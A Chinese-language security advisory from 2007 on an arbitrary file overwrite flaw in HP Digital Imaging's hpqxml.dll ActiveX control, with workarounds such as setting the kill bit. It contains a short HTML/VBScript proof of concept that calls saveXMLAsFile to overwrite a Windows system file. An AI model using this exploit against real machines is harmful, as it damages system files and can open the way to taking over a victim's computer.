发布日期:2007-06-26
更新日期:2007-06-28
受影响系统:
HP hpqxml.dll 2.0.0.133
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 24678
HP数码成像软件包为用户提供数码照片的编辑、打印等全套解决方案。
HP数码成像软件包中所捆绑的hpqxml.dll控件实现上存在漏洞,远程攻击者可能利用此漏洞控制用户机器。
hpqxml.dll中saveXMLAsFile方式没有正确地验证用户名参数,允许恶意用户使用任意数据覆盖系统上的文件;此外该方式在写操作之前没有检查文件头,可能会触发其他漏洞。
<*来源:Brian Mariani (bmariani@shellcode.com.ar)
链接:http://marc.info/?l=bugtraq&m=118297934715936&w=2
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<head>
<title>Hpqxml.dll 2.0.0.133 HP Digital Imaging Arbitary Data
Write</title>
</head>
<body>
<h3>Hpqxml.dll 2.0.0.133 HP Digital Imaging Arbitary Data Write</h3><br>
<object classid='clsid:9C0A0321-B328-466C-8ECA-B9A5522466D3'
id='target' /></object>
<input language=VBScript>
<script language = 'vbscript'>
Sub HP()
filename = "C:NTDETECT_.COM"
target.saveXMLAsFile filename
End Sub
</script>
</body>
</html>
建议:
--------------------------------------------------------------------------------
临时解决方法:
* 为clsid:9C0A0321-B328-466C-8ECA-B9A5522466D3设置Kill bit
* 使用regsvr32注销Unregister hpqxml.dll using.
厂商补丁:
HP
--
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://itrc.hp.com
【绿盟授权51CTO.COM 独家报道,未经书面许可不得转载!】
推荐阅读
发布日期:2007-06-26 更新日期:2007-06-27受影响系统: Avax Vector Avaxswf.dll 1.0.0.1 描述: -------------------------------------------------------------------------------- BUGTRAQ ID: 24659AVA>>>详细阅读
本文标题:HP数码成像软件包hpqxml.dll任意文件覆盖漏洞
地址:http://www.17bianji.com/anquan/buding/2737.html
1/2 1